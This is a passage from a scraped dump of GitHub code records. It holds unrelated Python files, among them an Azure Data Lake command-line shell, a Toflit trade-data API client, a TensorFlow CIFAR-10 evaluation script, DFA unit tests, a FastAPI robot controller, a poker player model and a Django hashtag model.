nargs='+')\n args = parser.parse_args(line.split())\n\n for d in args.dirs:\n self._fs.mkdir(d)\n\n def help_mkdir(self):\n print(\"mkdir directory ...\\n\")\n print(\"Create directories\")\n\n def do_mv(self, line):\n parser = argparse.ArgumentParser(prog=\"mv\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n self._fs.mv(args.files[0], args.files[1])\n\n def help_mv(self):\n print(\"mv from-path to-path\\n\")\n print(\"Rename from-path to to-path\")\n\n def do_put(self, line):\n parser = argparse.ArgumentParser(prog=\"put\", add_help=False)\n parser.add_argument('local_path', type=str)\n parser.add_argument('remote_path', type=str, nargs='?', default='.')\n parser.add_argument('-b', '--chunksize', type=int, default=2**28)\n parser.add_argument('-c', '--threads', type=int, default=None)\n parser.add_argument('-f', '--force', action='store_true')\n args = parser.parse_args(line.split())\n\n ADLUploader(self._fs, args.remote_path, args.local_path,\n nthreads=args.threads, chunksize=args.chunksize,\n overwrite=args.force)\n\n def help_put(self):\n print(\"put [option]... local-path [remote-path]\\n\")\n print(\"Store a local file on the remote machine\\n\")\n print(\"Options:\")\n print(\" -b \")\n print(\" --chunksize \")\n print(\" Set size of chunk to store atomically, in bytes.\\n\")\n print(\" -c \")\n print(\" --threads \")\n print(\" Set number of multiple requests to perform at a time.\")\n print(\" -f\")\n print(\" --force\")\n print(\" Overwrite an existing file or directory.\")\n\n def do_quit(self, line):\n return True\n\n def help_quit(self):\n print(\"quit\\n\")\n print(\"Exit the application\")\n\n def do_rm(self, line):\n parser = argparse.ArgumentParser(prog=\"rm\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-r', '--recursive', action='store_true')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.rm(f, recursive=args.recursive)\n\n def help_rm(self):\n print(\"rm [-r | --recursive] file ...\\n\")\n print(\"Remove directory entries\")\n\n def do_rmdir(self, line):\n parser = argparse.ArgumentParser(prog=\"rmdir\", add_help=False)\n parser.add_argument('dirs', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for d in args.dirs:\n self._fs.rmdir(d)\n\n def help_rmdir(self):\n print(\"rmdir directory ...\\n\")\n print(\"Remove directories\")\n\n def do_tail(self, line):\n parser = argparse.ArgumentParser(prog=\"tail\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-c', '--bytes', type=int, default=1024)\n args = parser.parse_args(line.split())\n\n for f in args.files:\n write_stdout(self._fs.tail(f, size=args.bytes))\n\n def help_tail(self):\n print(\"tail [-c bytes | --bytes bytes] file ...\\n\")\n print(\"Display last bytes of a file\")\n\n def do_touch(self, line):\n parser = argparse.ArgumentParser(prog=\"touch\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.touch(f)\n\n def help_touch(self):\n print(\"touch file ...\\n\")\n print(\"Change file access and modification times\")\n\n def do_EOF(self, line):\n return True\n\n def do_list_uploads(self, line):\n print(ADLUploader.load())\n\n def help_list_uploads(self):\n print(\"Shows interrupted but persisted downloads\")\n\n def do_clear_uploads(self, line):\n ADLUploader.clear_saved()\n\n def help_clear_uploads(self):\n print(\"Forget all persisted uploads\")\n\n def do_resume_upload(self, line):\n try:\n up = ADLUploader.load()[line]\n up.run()\n except KeyError:\n print(\"No such upload\")\n\n def help_resume_upload(self):\n print(\"resume_upload name\")\n print()\n print(\"Restart the upload designated by and run until done.\")\n\n def do_list_downloads(self, line):\n print(ADLDownloader.load())\n\n def help_list_downloads(self):\n print(\"Shows interrupted but persisted uploads\")\n\n def do_clear_downloads(self, line):\n ADLDownloader.clear_saved()\n\n def help_clear_downloads(self):\n print(\"Forget all persisted downloads\")\n\n def do_resume_download(self, line):\n try:\n up = ADLDownloader.load()[line]\n up.run()\n except KeyError:\n print(\"No such download\")\n\n def help_resume_download(self):\n print(\"resume_download name\")\n print()\n print(\"Restart the download designated by and run until done.\")\n\n\ndef setup_logging(default_level='WARNING'):\n \"\"\" Setup logging configuration\n\n The logging configuration can be overridden with one environment variable:\n\n ADLFS_LOG_LEVEL (defines logging level)\n \"\"\"\n import logging\n import os\n import sys\n\n log_level = os.environ.get('ADLFS_LOG_LEVEL', default_level)\n\n levels = dict(\n CRITICAL=logging.CRITICAL,\n ERROR=logging.ERROR,\n WARNING=logging.WARNING,\n INFO=logging.INFO,\n DEBUG=logging.DEBUG)\n\n if log_level in levels:\n log_level = levels[log_level]\n else:\n sys.exit(\"invalid ADLFS_LOG_LEVEL '{0}'\".format(log_level))\n\n logging.basicConfig(level=log_level)\n\n\nif __name__ == '__main__':\n setup_logging()\n fs = AzureDLFileSystem()\n if len(sys.argv) > 1:\n AzureDataLakeFSCommand(fs).onecmd(' '.join(sys.argv[1:]))\n else:\n AzureDataLakeFSCommand(fs).cmdloop()\n","repo_name":"Azure/azure-data-lake-store-python","sub_path":"samples/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":15937,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"47"} +{"seq_id":"12033560132","text":"from lib.base import Client\n\nclass Toflit(Client): \n \"\"\"\n Utilitaire permettant de requêter les données Toflit\n \"\"\"\n BASE_URL = 'http://toflit18.medialab.sciences-po.fr/api'\n \n def _format_response(self, response):\n \"\"\"\n Formatte les réponses de l'API Toflit pour renvoyer directement le payload des résultats\n \"\"\"\n if response is not None:\n return response['result']\n else :\n return None\n \n def get_directions(self, params=None):\n \"\"\"\n Synopsis : récupère les directions de la base\n ---\n Paramètres : aucun\n \"\"\"\n response = self.api('/directions', params=params)\n return self._format_response(response)\n \n def get_sources_types(self, params=None):\n \"\"\"\n Synopsis : récupère les types de sources disponibles\n ---\n Paramètres : aucun\n \"\"\"\n response = self.api('/source_types', params=params)\n return self._format_response(response)\n \n def get_product_classifications(self, params=None):\n \"\"\"\n Synopsis : récupère les classifications de produits\n ---\n Paramètres : aucun\n \"\"\"\n response = self.api('/classification', params=params)\n response = self._format_response(response)\n return response['product']\n\n def get_partner_classifications(self, params=None):\n \"\"\"\n Synopsis : récupère les classifications de partenaires\n ---\n Paramètres : aucun\n \"\"\"\n response = self.api('/classification', params=params)\n response = self._format_response(response)\n return response['partner']\n \n def get_classification_groups(self, classification, params=None):\n \"\"\"\n Synopsis : récupère l'ensemble des catégories associées à une classification en particulier (sans le détail des valeurs)\n Paramètre classification : le nom de la classification préfixé par son type (ex. \"product_simplification\", ou \"partner_source\")\n ---\n Paramètres : aucun ?\n \"\"\"\n response = self.api('/classification/' + classification + '/groups/', params=params)\n response = self._format_response(response)\n return response\n\n def get_classification_sliced_search(self, classification, params=None):\n \"\"\"\n Synopsis : récupère le détail des groupements associés à une classification en particulier, se limite à une tranche de résultat\n Paramètre classification : le nom de la classification préfixé par son type (ex. \"product_simplification\", ou \"partner_source\")\n ---\n Paramètres : aucun ?\n \"\"\"\n response = self.api('/classification/' + classification + '/search/', params=params)\n response = self._format_response(response)\n print (\"Nombre de classifications trouvées dans cette tranche : \", len(response))\n return response\n\n # but à terme : avoir 1 seule fonction (nécessite de gérer correctement l’argument query par défaut)\n def get_classification_search(self, classification, params=None, query={\"limit\":\"5000\"}): \n \"\"\"\n Synopsis : récupère le détail des groupements associés à une classification en particulier.\n Paramètre classification : le nom de la classification préfixé par son type (ex. \"product_simplification\", ou \"partner_source\")\n Paramètre query modifiable, par défaut on récupère les résultats par tranche de 5000 classifications \n ---\n Paramètres : aucun ?\n \"\"\"\n\n #initialisations\n results = []\n current_query = query.copy()\n current_index = query.get('offset', 0) # on donne valeur par défaut\n current_query['offset']=current_index\n limit = query['limit']\n error = None\n length = 1 # longueur d'une tanche (initialisé à 1 pour 1er passage dans while)\n\n # tant que j'ai des réponses (ou pas d'erreurs) je récupère des résultats par tranches\n while length: \n response = self.api('/classification/' + classification + '/search/', query=current_query) \n temp_results = self._format_response(response)\n length = len(temp_results)\n # print(\"length of current result :\", length)\n results += temp_results \n current_query['offset'] += int(limit)\n\n print (\"Nombre de classifications trouvées : \", len(results))\n return results \n \n \n def get_locations(self, classification, params=None):\n \"\"\"\n Synopsis : récupère le réseau des lieux (directions et partenaires) et le montant de leurs échanges\n ---\n Paramètre classification : l'id de la classification de partenaire à utiliser\n ---\n Paramètres :\n * dateMax : # année de début\n * dateMin : # année de fin\n * kind : total | import | export # quels flux utiliser\n * sourceType : # id du type de source à utiliser\n * product : > # liste des produits à filtrer\n * productClassification : # Classification de produit à utiliser pour le filtre\n \"\"\"\n response = self.api('/viz/network/' + classification, method='post', params=None, data=params)\n return self._format_response(response)\n \n def get_time_series(self, params=None):\n \"\"\"\n Synopsis : récupère des séries temporelles à propos des flux de marchandises\n ---\n Paramètres :\n * direction : \"$all$\" | [nom de direction] # nom de la direction à filtrer\n * sourceType : # id du type de source à utiliser\n * color: # pas pertinent / relatif à la visualisation\n * dateMax : # année de début\n * dateMin : # année de fin\n * partnerClassification : # le nom de la classification de partenaire à récupérer\n * partner : > # les partenaires commerciaux à prendre en compte (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n * kind : *total* | import | export # quels flux utiliser\n * product : > # liste des produits à filtrer\n * productClassification : # Classification de produit à utiliser pour le filtre\n \"\"\"\n response = self.api('/viz/line/', method='post', params=None, data=params)\n return self._format_response(response)\n \n def get_flows_per_year(self, type, params=None):\n \"\"\"\n Synopsis : récupère les flux par année par direction ou par type de source\n ---\n Paramètre type : le type de flux 'direction' ou 'sourceType'\n ---\n Paramètres :\n * direction : \"$all$\" | [nom de direction] # nom de la direction à filtrer\n * sourceType : # id du type de source à utiliser\n * color: # pas pertinent / relatif à la visualisation\n * dateMax : \n * dateMin : \n * partnerClassification : # le nom de la classification de partenaire à récupérer\n * partner : > # les partenaires commerciaux à prendre en compte (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n * kind : *total* | import | export # quels flux utiliser\n * product : > # liste des produits à filtrer\n * productClassification : # Classification de produit à utiliser pour le filtre\n \"\"\"\n response = self.api('/viz/flows_per_year/' + type, method='post', params=None, data=params)\n return self._format_response(response)\n \n def get_product_terms(self, classification, params=None):\n \"\"\"\n Synopsis : récupère des séries temporelles à propos des flux de marchandises\n ---\n Paramètre classification : l'id de la classification de produit à utiliser\n ---\n Paramètres :\n * direction : \"$all$\" | [nom de direction] # nom de la direction à filtrer\n * sourceType : # id du type de source à utiliser\n * color: # pas pertinent / relatif à la visualisation\n * dateMax : \n * dateMin : \n * childClassification : # le nom de la classification de produit à récupérer\n * child : > # les produits à filtrer (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n * partnerClassification : # le nom de la classification de partenaire à récupérer\n * partner : > # les partenaires commerciaux à prendre en compte (e.g. {\"id\": \"Raw_materials,_inedible,_except_fuels~product_sitc_EN\", \"name\": \"Raw materials, inedible, except fuels\", \"value\": \"Raw_materials,_inedible,_except_fuels~product_sitc_EN\"})\n * kind : *total* | import | export # quels flux utiliser\n * product : > # liste des produits à filtrer\n * productClassification : # Classification de produit à utiliser pour le filtre\n \"\"\"\n response = self.api('/viz/terms/' + classification, method='post', params=None, data=params)\n return self._format_response(response)\n \n def get_flows(self, params=None):\n \"\"\"\n Synopsis : récupère les flux au niveau de granularité maximal en fonction d'une série de paramètres\n ---\n Paramètres :\n * limit : # nombre d'entrées à renvoyer\n * skip : # à quel point de la liste commencer à renvoyer des éléments\n * columns : | liste des colonnes à renvoyer concernant les flux\n * kind : *total* | import | export # quels flux utiliser\n * direction : \"$all$\" | [nom de direction] # nom de la direction à filtrer\n * sourceType : # id du type de source à utiliser\n * color: # pas pertinent / relatif à la visualisation\n * dateMax : \n * dateMin : \n * partnerClassification : # le nom de la classification de partenaire à récupérer\n * partner : > # les partenaires commerciaux à prendre en compte (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n * product : > # liste des produits à filtrer\n * productClassification : # Classification de produit à utiliser pour le filtre\n \"\"\"\n\n #initialisations\n results = []\n current_params = params.copy()\n current_index = params['skip']\n limit = params['limit']\n error = None\n length = 1 # longueur d'une tanche (initialisé à 1 pour 1er passage dans while)\n\n # tant que j'ai des réponses (ou pas d'erreurs) je récupère des tranches de résultat\n while length: \n # print(\"index courant :\", current_index)\n response = self.api('/flows/', method='post', params=None, data={**current_params, \"skip\":current_index}) # retourne un objet json avec attribut result \n temp_results = self._format_response(response)\n length = len(temp_results)\n # print(\"length of current result :\", length)\n if length on veut sortir du while\n length=0\n \n results += temp_results # stock global de résultats\n current_index += limit\n # print(\"index incrémenté :\", current_index)\n\n print (\"Nombre de flows trouvés : \", len(results))\n return results \n ","repo_name":"medialab/portic-explorations","sub_path":"lib/toflit.py","file_name":"toflit.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7946559681","text":"import numpy as np\nimport tensorflow as tf\nfrom time import time\nimport math\n\n\nfrom include.data import get_data_set\nfrom include.model import model, lr\n\n\n\nx, y, keep_prob, output, y_pred_cls, global_step, learning_rate = model()\ntest_x, test_y = get_data_set(\"test\")\nglobal_accuracy = 0\nepoch_start = 0\n_BATCH_SIZE = 128\n_EPOCH = 20\n_SAVE_PATH = \"./tensorboard/cifar-10-v1.0.0/\"\n\n\nsaver = tf.train.Saver()\nsess = tf.Session()\n\n\ntry:\n print(\"\\nTrying to restore last checkpoint ...\")\n last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)\n saver.restore(sess, save_path=last_chk_path)\n print(\"Restored checkpoint from:\", last_chk_path)\nexcept Exception:\n print(\"\\nFailed to restore checkpoint. Initializing variables instead.\")\n\npredicted_out = np.zeros(shape=test_y.shape, dtype=np.float32, name='predicted_out')\npredicted_class = np.zeros(shape=len(test_x), dtype=np.int)\ni = 0\nwhile i < len(test_x):\n j = min(i + _BATCH_SIZE, len(test_x))\n batch_xs = test_x[i:j, :]\n batch_ys = test_y[i:j, :]\n predicted_class[i:j], predicted_out[i:j] = sess.run(\n [y_pred_cls, output],\n feed_dict={x: batch_xs, y: batch_ys, learning_rate: lr(1), keep_prob: 1.0}\n )\n i = j\n\nvector_embeddings = tf.get_variable('predicted_out', test_y.shape)\nwith open(\"metadata.tsv\", 'w') as file_metadata:\n for label in enumerate(predicted_class):\n file_metadata.write(label+'\\n')","repo_name":"zlf1993/Graduate-Seminar","sub_path":"tensorflow-cifar-10-master/test_jupyter.py","file_name":"test_jupyter.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41848280127","text":"from core.networks.double_nodes.AbstractDifferentiableDoubleNode import AbstractDifferentiableDoubleNode\n\n\nclass AbstractNaturalDifferentiableDoubleNode(AbstractDifferentiableDoubleNode):\n\n def __init__(self, b_size, n_z_samples, b_size_int, n_z_samples_int, clip_probs=0, pm=True, initializers={},\n regularizers={},\n automatic_diff=False):\n super().__init__(b_size=b_size, n_z_samples=n_z_samples, b_size_int=b_size_int, n_z_samples_int=n_z_samples_int,\n clip_probs=clip_probs, pm=pm,\n initializers=initializers, regularizers=regularizers, automatic_diff=automatic_diff)\n\n def wake(self, use_natural=False, weights=None, global_step=None, layer_name=\"\", imp_weights=None,\n fisher_calculator=None):\n if self._automatic_diff:\n self._gradients_w = self.auto_diff(loss=self.loss_w, variables=self.variables_w,\n stops=[self.sample_w_q, self.inputs_r],\n weights=weights)\n else:\n self._gradients_w = self.manual_diff(self.inputs_r, self.probs_w_p, self.sample_w_q,\n weights=weights)\n\n if use_natural:\n self._natural_gradients_w = self.gen_distr._apply_fisher_multipliers(\n fisher_calculator=fisher_calculator,\n next_layer_distr_probs=self.probs_s_p,\n previous_layer_sample=self.inputs_p,\n grads=self._gradients_w,\n global_step=global_step,\n layer=layer_name,\n imp_weights=imp_weights) # only one that needs this\n return self._natural_gradients_w, self.variables_w\n else:\n return self._gradients_w, self.variables_w\n\n def wake_phase_sleep(self, use_natural=False, weights=None, global_step=None, layer_name=\"\",\n fisher_calculator=None):\n\n if self._automatic_diff:\n self._gradients_ws = self.auto_diff(loss=self.loss_w_s, variables=self.variables_s,\n stops=[self.inputs_r],\n weights=weights) # Loss?\n else:\n self._gradients_ws = self.manual_diff(self.sample_w_q, self.probs_w_q, self.inputs_r,\n weights=weights)\n\n if use_natural:\n self._natural_gradients_ws = self.rec_distr._apply_fisher_multipliers(\n fisher_calculator=fisher_calculator,\n next_layer_distr_probs=self.probs_w_q,\n previous_layer_sample=self.inputs_r,\n grads=self._gradients_ws,\n global_step=global_step,\n layer=layer_name,\n imp_weights=None)\n return self._natural_gradients_ws, self.variables_s\n else:\n return self._gradients_ws, self.variables_s\n\n def sleep(self, use_natural=False, weights=None, global_step=None, layer_name=\"\", fisher_calculator=None):\n if self._automatic_diff:\n self._gradients_s = self.auto_diff(loss=self.loss_s, variables=self.variables_s,\n stops=[self.sample_s_p, self.inputs_p],\n weights=weights)\n else:\n self._gradients_s = self.manual_diff(self.inputs_p, self.probs_s_q, self.sample_s_p,\n weights=weights)\n if use_natural:\n self._natural_gradients_s= self.rec_distr._apply_fisher_multipliers(\n fisher_calculator=fisher_calculator,\n next_layer_distr_probs=self.probs_w_q,\n previous_layer_sample=self.inputs_r,\n grads=self._gradients_s,\n global_step=global_step,\n layer=layer_name,\n imp_weights=None)\n return self._natural_gradients_s, self.variables_s\n else:\n return self._gradients_s, self.variables_s\n","repo_name":"szokejokepu/natural-rws","sub_path":"core/networks/double_nodes/AbstractNaturalDifferentiableDoubleNode.py","file_name":"AbstractNaturalDifferentiableDoubleNode.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14832569697","text":"def num_vow(word):\r\n vowels = set(\"aeiouAEIOU\")\r\n count = 0 \r\n for char in word:\r\n if char in vowels:\r\n count += 1\r\n return count\r\n\r\nword = \"you are a star\"\r\nprint(num_vow(word))","repo_name":"das28/python_programs","sub_path":"python programms/strings/num_vowels_using_set.py","file_name":"num_vowels_using_set.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12770176366","text":"from datetime import datetime\n\nfrom pokerserver.database import PlayersRelation, PlayerState\n\nPLAYER_NAME_PATTERN = \"[A-Za-z0-9]{3,}\"\n\n\nclass PlayerNotFoundError(Exception):\n pass\n\n\nclass Player:\n # pylint: disable=too-many-instance-attributes\n def __init__(self, table_id, position, name, balance, cards, bet, # pylint: disable=too-many-arguments\n last_seen=None, state=PlayerState.PLAYING):\n self.table_id = table_id\n self.position = position\n self.name = name\n self.balance = balance\n self.cards = cards\n self.bet = bet\n self.last_seen = last_seen if last_seen is not None else datetime.now()\n self.state = state\n\n def __eq__(self, other):\n if not isinstance(other, Player):\n return False\n return self.__dict__ == other.__dict__\n\n def __hash__(self):\n return hash(self.name)\n\n def to_dict(self, show_cards=False):\n return {\n 'table_id': self.table_id,\n 'position': self.position,\n 'name': self.name,\n 'balance': self.balance,\n 'cards': self.cards if show_cards else [],\n 'bet': self.bet,\n 'state': self.state.value\n }\n\n @classmethod\n async def load_by_name(cls, name):\n player = await PlayersRelation.load_by_name(name)\n if player is not None:\n return Player(**player)\n else:\n raise PlayerNotFoundError()\n\n @classmethod\n async def load_if_exists(cls, name):\n return await PlayersRelation.load_by_name(name)\n\n @classmethod\n async def sit_down(cls, table, position, name, balance): # pylint: disable=too-many-arguments\n await PlayersRelation.add_player(\n table.table_id,\n position,\n name,\n balance,\n cards=[],\n bet=0,\n last_seen=datetime.now(),\n state=PlayerState.SITTING_OUT\n )\n\n @classmethod\n async def load_by_table_id(cls, table_id):\n players = await PlayersRelation.load_by_table_id(table_id)\n return [cls(**player) for player in players]\n\n @classmethod\n def is_valid_name(cls, name):\n return name.isalpha()\n\n async def set_bet(self, bet):\n self.bet = bet\n await PlayersRelation.set_bet(self.name, self.table_id, self.bet)\n\n async def reset(self):\n await self.set_bet(0)\n await self.set_state(PlayerState.PLAYING)\n\n async def increase_bet(self, amount):\n assert amount > 0, 'Need to increase bet by more than 0.'\n await PlayersRelation.set_balance_and_bet(self.name, self.table_id, self.balance - amount, self.bet + amount)\n self.balance -= amount\n self.bet += amount\n if self.balance == 0:\n await self.all_in()\n\n async def increase_balance(self, increase):\n assert increase >= 0, 'the balance increase must not be negative'\n self.balance += increase\n await PlayersRelation.set_balance(self.name, self.table_id, self.balance)\n\n async def set_cards(self, cards):\n assert len(cards) <= 2\n await PlayersRelation.set_cards(self.name, self.table_id, cards)\n self.cards = cards\n\n async def fold(self):\n await self.set_state(PlayerState.FOLDED)\n\n async def all_in(self):\n await self.set_state(PlayerState.ALL_IN)\n\n def is_all_in(self):\n return self.state == PlayerState.ALL_IN\n\n async def sit_out(self):\n await self.set_state(PlayerState.SITTING_OUT)\n\n async def set_state(self, state):\n self.state = state\n await PlayersRelation.set_state(self.name, self.table_id, self.state)\n\n def __repr__(self):\n return ''.format(self.name)\n\n def __str__(self):\n return self.name\n","repo_name":"MartinAltmayer/pokerserver","sub_path":"pokerserver/models/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"10993038482","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 24 15:00:04 2021\n\n@author: Aspire\n\"\"\"\n\nt = int(input())\n\nfor i in range(0,t):\n n = int(input())\n a = list(map(int,input().split()))\n c = 0\n d = 0\n for j in range(0,n):\n if j%2 != a[j]%2:\n if j%2==0:\n c = c + 1\n elif j%2!=0:\n d = d + 1\n \n if c==d:\n print(c)\n else:\n print('-1')","repo_name":"tanjina-3ni/CodeForces-Solutions","sub_path":"1367B.py","file_name":"1367B.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21092328745","text":"from unittest import TestCase\n\nfrom src.dataStructures.dfa import DFA\n\n\nclass TestDFA(TestCase):\n def setUp(self) -> None:\n alphabet = {\"a\", \"b\"}\n states = {\"\", \"a\", \"b\", \"aa\", \"bb\", \"ab\", \"ba\"}\n transitions = {}\n initial_state = \"\"\n final_states = {\"bb\", \"aa\"}\n\n self.dfa = DFA(states, alphabet, transitions, initial_state, final_states)\n return super().setUp()\n\n def test_add_transition_empty_transitions(self):\n from_state = \"a\"\n symbol = \"b\"\n to_state = \"ab\"\n\n self.dfa.add_transition(from_state, symbol, to_state)\n\n self.assertEqual(self.dfa.transitions, {\"a\": {\"b\": \"ab\"}})\n\n def test_add_transition_not_empty_transitions(self):\n self.dfa.add_transition(\"a\", \"a\", \"aa\")\n from_state = \"a\"\n symbol = \"b\"\n to_state = \"ab\"\n\n self.dfa.add_transition(from_state, symbol, to_state)\n\n self.assertEqual(self.dfa.transitions, {\"a\": {\"a\": \"aa\", \"b\": \"ab\"}})\n\n def test_next_state_valid(self):\n self.dfa.add_transition(\"a\", \"a\", \"aa\")\n from_state = \"a\"\n symbol = \"a\"\n next_state = \"aa\"\n\n result = self.dfa.next_state(symbol, from_state)\n\n self.assertEqual(result, next_state)\n\n def test_next_state_invalid(self):\n self.dfa.add_transition(\"a\", \"a\", \"aa\")\n from_state = \"a\"\n symbol = \"b\"\n\n invalid = False\n try:\n self.dfa.next_state(symbol, from_state)\n except ValueError:\n invalid = True\n\n self.assertTrue(invalid)\n\n def test_parse_string_valid(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n self.dfa.add_transition(\"a\", \"b\", \"ab\")\n string = \"ab\"\n\n result = self.dfa.parse_string(string)\n\n self.assertEqual(result, [\"\", \"a\", \"ab\"])\n\n def test_parse_string_invalid(self):\n string = \"ab\"\n\n invalid = False\n try:\n self.dfa.parse_string(string)\n except ValueError:\n invalid = True\n\n self.assertTrue(invalid)\n\n def test_has_transition_valid(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"\"\n symbol = \"a\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertTrue(result)\n\n def test_has_transition_invalid_state(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"b\"\n symbol = \"a\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertFalse(result)\n\n def test_has_transition_invalid_symbol(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"\"\n symbol = \"b\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertFalse(result)\n","repo_name":"agranadosb/TFG","sub_path":"src/dataStructures/tests/test_dfa.py","file_name":"test_dfa.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10186232226","text":"from fastapi import FastAPI, Request, WebSocket\nfrom fastapi.templating import Jinja2Templates\nfrom src.robot_movement import direction_of_movement\nfrom src.robot_movement import move_direction\nfrom src.robot_movement import set_gpio_mode\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates/\")\n\nset_gpio_mode() \n\n@app.get('/')\ndef omniwheeler_app():\n return \"Omniwheeler App\"\n\n\n@app.get(\"/index\")\ndef remote_control_direction_post(request: Request):\n result = \"Click a direction\"\n return templates.TemplateResponse('index.html', context={'request': request, 'result': result})\n\n\n#@app.post(\"/index\")\n#def remote_control_direction_post(request: Request, direction: str = Form(...)):\n# result = direction_of_movement(direction)\n# return templates.TemplateResponse('index.html', context={'request': request, 'result': result})\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n while True:\n data = await websocket.receive_text()\n # rotation is a temp variable to print data. Calling move_direction(data)\n # Should be enough to move the omniwheeler\n rotation = direction_of_movement(data)\n # Move the wheels acw, cw, still to head in a specific direction NSEW\n #move_direction(rotation) \n rotation = str(direction_of_movement(data))\n print(\"\\ndata:\", data, '\\nWheel movement', rotation )\n move_direction(data) # This sends the signal to move the wheels\n await websocket.send_text(f\"The wheel Rotation is: {rotation}\")","repo_name":"tzunun/Omniwheeler","sub_path":"src/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19897831624","text":"import GlobalVariables as GetVar\r\nimport pygame\r\nimport GameDraw as Game\r\n\r\n\r\ndef PauseLoop():\r\n \r\n #game window\r\n window = pygame.display.set_mode((GetVar.win_x, GetVar.win_y))\r\n \r\n #intro loop\r\n while GetVar.PauseState:\r\n \r\n #define the refresh rate\r\n pygame.time.delay(GetVar.Refresh_Rate)\r\n \r\n #allow the user to close the window\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n GetVar.PauseState = False\r\n GetVar.GameState = False\r\n \r\n #set the background color\r\n Game.SolidBackgroundColor(window, \"pink\")\r\n \r\n #some other stuff here\r\n Game.Rect_Button(window, \"\", \"limegreen\", \"\", \"\", 0, GetVar.win_x*0.25, GetVar.win_y*0.75, 50, 25)\r\n Game.Rect_Button(window, \"\", \"red\", \"\", \"\", 0, GetVar.win_x*0.65, GetVar.win_y*0.75, 50, 25)\r\n \r\n #see if the mouse is hovering over the button \r\n MousePos = pygame.mouse.get_pos()\r\n if MousePos[0] > GetVar.win_x*0.25 and MousePos[0] < GetVar.win_x*0.25 + 50:\r\n if MousePos[1] > GetVar.win_y*0.75 and MousePos[1] < GetVar.win_y*0.75 + 25:\r\n Game.Rect_Button(window, \"\", \"lime\", \"\", \"\", 0, GetVar.win_x*0.25, GetVar.win_y*0.75, 50, 25)\r\n LeftClick = pygame.mouse.get_pressed()[0]\r\n if LeftClick == True:\r\n GetVar.PauseState = False\r\n \r\n if MousePos[0] > GetVar.win_x*0.65 and MousePos[0] < GetVar.win_x*0.65 + 50:\r\n if MousePos[1] > GetVar.win_y*0.75 and MousePos[1] < GetVar.win_y*0.75 + 25:\r\n Game.Rect_Button(window, \"\", \"lightcoral\", \"\", \"\", 0, GetVar.win_x*0.65, GetVar.win_y*0.75, 50, 25)\r\n \r\n \r\n \r\n #update the display\r\n pygame.display.update()","repo_name":"ErickAiken/Python","sub_path":"PyGame/PauseLoop.py","file_name":"PauseLoop.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"679643185","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom thoughts.hashtags import unique_hashtags\n\n\nclass Thought(models.Model):\n owner = models.ForeignKey(\n 'auth.User',\n editable=False,\n on_delete=models.CASCADE\n )\n thought = models.TextField(max_length=800, editable=False)\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.thought\n\n\nclass Hashtag(models.Model):\n creator = models.ForeignKey(\n 'auth.User',\n editable=False,\n on_delete=models.SET_NULL,\n null=True\n )\n hashtag = models.TextField(max_length=100, editable=False, unique=True)\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n thoughts = models.ManyToManyField(Thought)\n\n\n@receiver(post_save, sender=Thought)\ndef register_thought_hashtags(sender, created, instance, **kwargs):\n if created:\n hashtags = unique_hashtags(instance.thought)\n for hashtag in hashtags:\n try:\n hashtag_model = Hashtag.objects.get(hashtag=hashtag)\n except ObjectDoesNotExist:\n hashtag_model = Hashtag(hashtag=hashtag, creator=instance.owner)\n hashtag_model.save()\n\n hashtag_model.thoughts.add(instance)\n hashtag_model.save()\n print('Houston, we have a 